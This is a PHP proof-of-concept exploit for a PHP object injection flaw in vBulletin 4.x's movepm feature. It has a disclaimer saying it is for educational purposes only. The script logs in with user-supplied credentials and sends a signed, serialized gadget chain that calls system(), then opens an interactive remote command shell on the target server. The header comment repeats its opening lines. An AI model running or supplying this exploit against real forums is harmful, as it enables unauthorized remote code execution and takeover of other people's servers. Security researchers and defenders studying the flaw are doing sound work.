<?php

/*
---------------------------------------------------------
vBulletin 4.x <?php

/*
---------------------------------------------------------
vBulletin 4.x (movepm) PHP Object Injection Vulnerability
---------------------------------------------------------

author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: https://www.vbulletin.com

+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+

[-] Technical Writeup:

https://karmainsecurity.com/riding-the-time-machine-old-vbulletin-php-object-injection
*/

set_time_limit(0);
error_reporting(E_ERROR);

print "\n+-------------------------------------------------------------+";
print "\n| vBulletin 4.x (movepm) PHP Object Injection Exploit by EgiX |";
print "\n+-------------------------------------------------------------+\n";

if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");

if ($argc != 4)
{
print "\nUsage......: php $argv[0] <URL> <Username> <Password>\n";
print "\nExample....: php $argv[0] http://localhost/vb4/ egix password";
print "\nExample....: php $argv[0] https://vbulletin.com/ hacker pwned\n\n";
die();
}

class vB_Database
{
public $functions = array("free_result" => "system");
}

class vB_dB_Result
{
protected $db, $recordset;

function __construct($cmd)
{
$this->db = new vB_Database;
$this->recordset = $cmd;
}
}

class vB_Route_Error
{
protected $_segment_scheme, $_validated_scheme = true;

function __construct($cmd)
{
$this->_segment_scheme = new vB_dB_Result($cmd);
}
}

function exec_cmd($cmd)
{
global $ch, $url, $token;

$chain = serialize(new vB_Route_Error($cmd));
$chain = base64_encode('O:8:"DateTime":1:{s:4:"date";'.$chain.'}');

curl_setopt($ch, CURLOPT_URL, "{$url}admincp/index.php");
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([$chain => 1]));

if (!preg_match('/name="postvars" value="([^"]+)"/', curl_exec($ch), $signed)) die("[-] postvars not found!\n\n");

$params = ["do" => "movepm", "securitytoken" => $token[1], "messageids" => "B64:" . html_entity_decode($signed[1])];

curl_setopt($ch, CURLOPT_URL, "{$url}private.php");
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));

return curl_exec($ch);
}

$url = $argv[1];
$user = $argv[2];
$pwd = $argv[3];
$ch = curl_init();

@unlink("./cookies.txt");

curl_setopt($ch, CURLOPT_URL, "{$url}login.php");
curl_setopt($ch, CURLOPT_COOKIEJAR, "./cookies.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "./cookies.txt");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["do" => "login", "vb_login_username" => $user, "vb_login_password" => $pwd]));

print "\n[+] Performing login with username '{$user}' and password '{$pwd}'\n";

if (!strstr(curl_exec($ch), $user)) die("[-] Login failed!\n\n");

print "[+] Launching shell\n";

curl_setopt($ch, CURLOPT_URL, "{$url}private.php");
curl_setopt($ch, CURLOPT_POST, false);

if (!preg_match('/SECURITYTOKEN = "([^"]+)"/i', curl_exec($ch), $token)) die("[-] SECURITYTOKEN not found!\n\n");

while(1)
{
print "\nvBulletin-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
$cmd .= "; echo _______";
preg_match('/(.*)_______/s', exec_cmd($cmd), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
}